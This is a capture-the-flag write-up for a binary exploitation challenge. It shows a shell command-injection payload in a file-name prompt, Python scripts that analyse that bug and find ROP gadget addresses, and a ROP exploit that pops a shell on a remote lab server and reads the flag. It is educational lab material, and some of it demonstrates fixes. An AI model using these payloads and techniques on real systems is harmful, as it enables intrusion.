Sacred Scrolls' Revenge
This challenge is a fixed version of Sacred Scrolls. Almost all the program behavior is the same as in the previous version, so read that writeup before this one.
The challenge was re-released because the first version had an unintended solution: the file name entered at the upload prompt was handed to a shell unsanitized, so a closing quote and a semicolon were enough for command injection:
$ ./sacred_scrolls
[ASCII-art banner and stylised Unicode words not rendered in the extracted page]
[+] All [...] have been whiped out..
Enter your wizard tag: asdf
Interact with magic library asdf
1. Upload [...]
2. Read [...]
2. Cast [...]
3. Leave
>> 1
[*] Enter file (it will be named spell.zip): '; /bin/sh; echo '
$ ls
glibc sacred_scrolls sacred_scrolls_revenge solve.py
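The bug behind that payload, as an added example rather than the challenge's own source (which the writeup does not show): it assumes the original built a zip command line with the user's file name interpolated inside single quotes and passed it to system(). The script tokenizes the injected command line the way a POSIX shell would, so the command boundaries the payload creates become visible, and then shows the two fixes: shlex.quote for a string that really must go through a shell, and an argv list with no shell at all. PAYLOAD, build_vulnerable_command, build_quoted_command, build_safe_argv and injected_commands are names chosen here.

```python
import shlex
import subprocess

# Constructed from the writeup: the string typed at the upload prompt. It
# closes the single-quoted argument, runs /bin/sh, then re-opens a quote so
# the rest of the command line still parses.
PAYLOAD = "'; /bin/sh; echo '"


def build_vulnerable_command(name):
    """Assumed shape of the original bug (the challenge source is not shown):
    the user-controlled file name is pasted into a shell command line inside
    single quotes and then handed to system()."""
    return f"zip spell.zip '{name}'"


def build_quoted_command(name):
    """Minimal fix if the string really must go through a shell: shlex.quote()
    turns every embedded quote into a quoted quote, so the name can no longer
    terminate the argument."""
    return "zip spell.zip " + shlex.quote(name)


def build_safe_argv(name):
    """Proper fix: pass the name as one argv element and never involve a shell.
    A leading '-' would still be parsed by zip as an option, so reject it."""
    if not name or name.startswith("-") or "\x00" in name:
        raise ValueError("refusing suspicious file name: %r" % name)
    return ["zip", "spell.zip", name]


def shell_words(cmd):
    """Tokenize a command line the way a POSIX shell would, keeping ';' as its
    own token so that command boundaries become visible."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    return list(lexer)


def injected_commands(cmd):
    """Split the tokenized command line at ';' into the simple commands the
    shell would actually run, one argv list each."""
    commands, current = [], []
    for tok in shell_words(cmd):
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def upload(name):
    """Hardened upload step: argv list, shell=False (the default)."""
    return subprocess.run(build_safe_argv(name), check=True)


if __name__ == "__main__":
    for label, cmd in (("vulnerable", build_vulnerable_command(PAYLOAD)),
                       ("shlex.quote", build_quoted_command(PAYLOAD))):
        print(label, "->", injected_commands(cmd))
    print("argv ->", build_safe_argv(PAYLOAD))
```

With the vulnerable builder the payload splits the line into three commands (zip with an empty name, /bin/sh, echo), which is exactly the shell the writeup got. After shlex.quote the whole payload survives as a single argument to zip, and with the argv form there is no shell to parse it in the first place; the leading-dash check is there because option injection through file names is the next thing an attacker tries once quoting is fixed.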
Trying the previous exploit
Let’s try to run the previous exploit on the updated program:
$ md5sum sacred_scrolls*
33c5fddcfed4332d797e7f2f5d74e75f sacred_scrolls
c4e656f3ecaa810d7d3e7c83922eff13 sacred_scrolls_revenge
$ cp solve.py solve_revenge.py
$ sed -i s/sacred_scrolls/sacred_scrolls_revenge/g solve_revenge.py
$ python3 solve_revenge.py
[*] './sacred_scrolls_revenge'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[+] Starting local process './sacred_scrolls_revenge': pid 3933065
[*] "/bin/sh" address: 0x7fca52de9698
adding: spell.txt (deflated 54%)
[*] Switching to interactive mode
[-] This spell is not quiet effective, thus it will not be saved!
[*] Got EOF while reading in interactive
$
And it doesn't work. The exploit still gets as far as resolving the runtime address of "/bin/sh" in libc, so that part is intact; whatever breaks must be later, in the ROP chain itself.
Fixing the exploit
Since the binary was recompiled, the code in .text has moved, so the address of the pop rdi; ret gadget, and possibly that of system@plt, have changed. Compare both binaries:
$ ROPgadget --binary sacred_scrolls | grep 'pop rdi'
0x0000000000401183 : pop rdi ; ret
$ ROPgadget --binary sacred_scrolls_revenge | grep 'pop rdi'
0x00000000004011b3 : pop rdi ; ret
$ objdump -M intel -d sacred_scrolls | grep system
0000000000400820 <system@plt>:
400820: ff 25 6a 27 20 00 jmp QWORD PTR [rip+0x20276a] # 602f90 <system@GLIBC_2.2.5>
400a28: e8 f3 fd ff ff call 400820 <system@plt>
400a34: e8 e7 fd ff ff call 400820 <system@plt>
400c6c: e8 af fb ff ff call 400820 <system@plt>
400cfb: e8 20 fb ff ff call 400820 <system@plt>
$ objdump -M intel -d sacred_scrolls_revenge | grep system
0000000000400820 <system@plt>:
400820: ff 25 6a 27 20 00 jmp QWORD PTR [rip+0x20276a] # 602f90 <system@GLIBC_2.2.5>
400a28: e8 f3 fd ff ff call 400820 <system@plt>
400a34: e8 e7 fd ff ff call 400820 <system@plt>
400c9a: e8 81 fb ff ff call 400820 <system@plt>
400d29: e8 f2 fa ff ff call 400820 <system@plt>
Indeed, the gadget moved from 0x401183 to 0x4011b3, while system@plt is still at 0x400820 (only the call sites inside .text shifted). So the gadget address is the only value that needs updating; patch it and run the exploit again:
$ sed -i s/401183/4011b3/g solve_revenge.py
$ python3 solve_revenge.py
[*] './sacred_scrolls_revenge'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[+] Starting local process './sacred_scrolls_revenge': pid 3934860
[*] "/bin/sh" address: 0x7f1196b16698
adding: spell.txt (deflated 54%)
[*] Switching to interactive mode
[-] This spell is not quiet effective, thus it will not be saved!
$ ls
glibc sacred_scrolls_revenge solve_revenge.py spell.zip
sacred_scrolls solve.py spell.txt
There we have it.
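Rather than patching hex constants with sed, the addresses can be derived from the binary. The following Python is an added example, not the author's solve.py: it decodes the two instruction forms shown in the objdump output above (the jmp [rip+disp32] of a PLT stub, whose GOT slot is relative to the next instruction, and the call rel32 at each call site) and scans for the pop rdi; ret byte pair the way ROPgadget does. SAMPLE is constructed from the bytes objdump printed for sacred_scrolls_revenge; executable_sections() reads real ELF64 section headers so the same scan can run on the binary itself, but nothing in it comes from the challenge source, and the function names are chosen here.

```python
import re
import struct
import sys

# Constructed from the objdump/ROPgadget output for sacred_scrolls_revenge:
# the bytes of the system@plt stub, one of its call sites, and the
# 'pop rdi; ret' pair, keyed by virtual address. Fragments, not the whole
# binary, so the decoders can be checked without the ELF present.
SAMPLE = {
    0x400820: bytes.fromhex("ff256a272000"),  # jmp QWORD PTR [rip+0x20276a]
    0x400a28: bytes.fromhex("e8f3fdffff"),    # call 400820 <system@plt>
    0x4011b3: bytes.fromhex("5fc3"),          # pop rdi ; ret
}


def decode_plt_jmp(addr, code):
    """jmp [rip+disp32] is encoded ff 25 <disp32>. RIP-relative means relative
    to the *next* instruction, so the GOT slot is addr + 6 + disp32."""
    if len(code) < 6 or code[:2] != b"\xff\x25":
        return None
    (disp,) = struct.unpack_from("<i", code, 2)
    return addr + 6 + disp


def decode_call_rel32(addr, code):
    """call rel32 is encoded e8 <rel32>, signed and relative to addr + 5."""
    if len(code) < 5 or code[:1] != b"\xe8":
        return None
    (rel,) = struct.unpack_from("<i", code, 1)
    return addr + 5 + rel


def find_pop_rdi_ret(base, code):
    """Every address where the bytes 5f c3 (pop rdi; ret) occur. Like
    ROPgadget, this is a byte search, so it also finds unintended gadgets
    that start in the middle of a longer instruction."""
    return [base + m.start() for m in re.finditer(b"\x5f\xc3", code)]


def executable_sections(path):
    """Read every SHF_EXECINSTR section of an ELF64 file as {vaddr: bytes}
    (assumes the standard ELF64 header layout; no pyelftools needed).
    Only used when a path is given on the command line."""
    with open(path, "rb") as f:
        data = f.read()
    if data[:4] != b"\x7fELF" or data[4] != 2:
        raise ValueError("ELF64 only")
    (e_shoff,) = struct.unpack_from("<Q", data, 0x28)
    e_shentsize, e_shnum = struct.unpack_from("<HH", data, 0x3a)
    sections = {}
    for i in range(e_shnum):
        _name, _type, flags, addr, offset, size = struct.unpack_from(
            "<IIQQQQ", data, e_shoff + i * e_shentsize)
        if flags & 0x4 and size:  # SHF_EXECINSTR
            sections[addr] = data[offset:offset + size]
    return sections


def scan(fragments):
    """Resolve PLT stubs to their GOT slots, find the call sites that target
    those stubs, and list pop rdi; ret gadgets. Outside .plt an ff 25 match
    may be a false positive, so treat the stub map as a candidate list."""
    plt, gadgets = {}, []
    for base, code in fragments.items():
        for m in re.finditer(b"\xff\x25", code):
            got = decode_plt_jmp(base + m.start(), code[m.start():])
            if got is not None:
                plt[base + m.start()] = got
        gadgets += find_pop_rdi_ret(base, code)
    calls = {}
    for base, code in fragments.items():
        for m in re.finditer(b"\xe8", code):
            target = decode_call_rel32(base + m.start(), code[m.start():])
            if target in plt:  # e8 also occurs inside immediates; keep only real PLT calls
                calls[base + m.start()] = target
    return {"plt_got": plt, "calls": calls, "pop_rdi_ret": gadgets}


if __name__ == "__main__":
    blobs = executable_sections(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE
    result = scan(blobs)
    for stub, slot in result["plt_got"].items():
        print("PLT stub %#x -> GOT slot %#x" % (stub, slot))
    for site, stub in result["calls"].items():
        print("call at %#x -> %#x" % (site, stub))
    for g in result["pop_rdi_ret"]:
        print("pop rdi; ret at %#x" % g)
```

Run without arguments it reproduces the numbers objdump printed (0x400820 + 6 + 0x20276a = 0x602f90, and 0x400a28 + 5 - 0x20d = 0x400820); run as python3 scan.py ./sacred_scrolls_revenge it lists the real gadgets. In a pwntools script the equivalent lookups are ROP(elf).find_gadget(['pop rdi', 'ret']).address and elf.plt['system'], and doing it that way is what keeps an exploit working when a non-PIE binary is recompiled. The objdump output also explains why system@plt stayed put while the gadget moved: the PLT is laid out before .text and its size depends only on the number of imported functions, so a rebuild that adds code to .text shifts the gadget and the call sites (400c6c became 400c9a) but not the stub.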
Flag
So, let’s try remotely:
$ python3 solve_revenge.py 178.62.5.219:32580
[*] './sacred_scrolls_revenge'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[+] Opening connection to 178.62.5.219 on port 32580: Done
[*] "/bin/sh" address: 0x7fc46b11f698
updating: spell.txt (deflated 54%)
[*] Switching to interactive mode
[-] This spell is not quiet effective, thus it will not be saved!
$ ls
flag.txt
glibc
sacred_scrolls
spell.txt
spell.zip
$ cat flag.txt
HTB{m4y_th3_b0y_wh0_l1v3d_h3lp_u}